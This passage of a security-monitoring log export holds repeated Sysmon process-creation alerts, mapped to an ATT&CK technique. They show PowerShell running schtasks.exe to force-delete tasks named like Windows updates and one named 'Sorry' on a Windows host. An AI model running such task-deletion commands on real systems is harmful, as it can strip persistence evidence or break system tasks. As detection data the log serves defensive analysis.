Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.005",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.567 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001038c32b00} +ProcessId: 868 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.570795300Z"",""eventRecordID"":""3303"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.567\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001038c32b00}\r\nProcessId: 868\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.567"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001038c32b00}"",""processId"":""868"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:03.992",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.532 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00107ec12b00} +ProcessId: 5660 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.535413800Z"",""eventRecordID"":""3302"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.532\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00107ec12b00}\r\nProcessId: 5660\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.532"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00107ec12b00}"",""processId"":""5660"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:03.939",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.493 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010c7bf2b00} +ProcessId: 7292 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.504896300Z"",""eventRecordID"":""3301"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.493\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010c7bf2b00}\r\nProcessId: 7292\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.493"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010c7bf2b00}"",""processId"":""7292"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.589",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.460 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010e7bd2b00} +ProcessId: 8056 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.462786800Z"",""eventRecordID"":""3300"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.460\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010e7bd2b00}\r\nProcessId: 8056\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.460"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010e7bd2b00}"",""processId"":""8056"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.563",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.434 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a8bb2b00} +ProcessId: 6676 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.437847300Z"",""eventRecordID"":""3299"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.434\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a8bb2b00}\r\nProcessId: 6676\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.434"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010a8bb2b00}"",""processId"":""6676"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.542",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.404 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001064b92b00} +ProcessId: 360 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.409104300Z"",""eventRecordID"":""3298"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.404\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001064b92b00}\r\nProcessId: 360\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Sorry /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.404"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001064b92b00}"",""processId"":""360"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Sorry /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 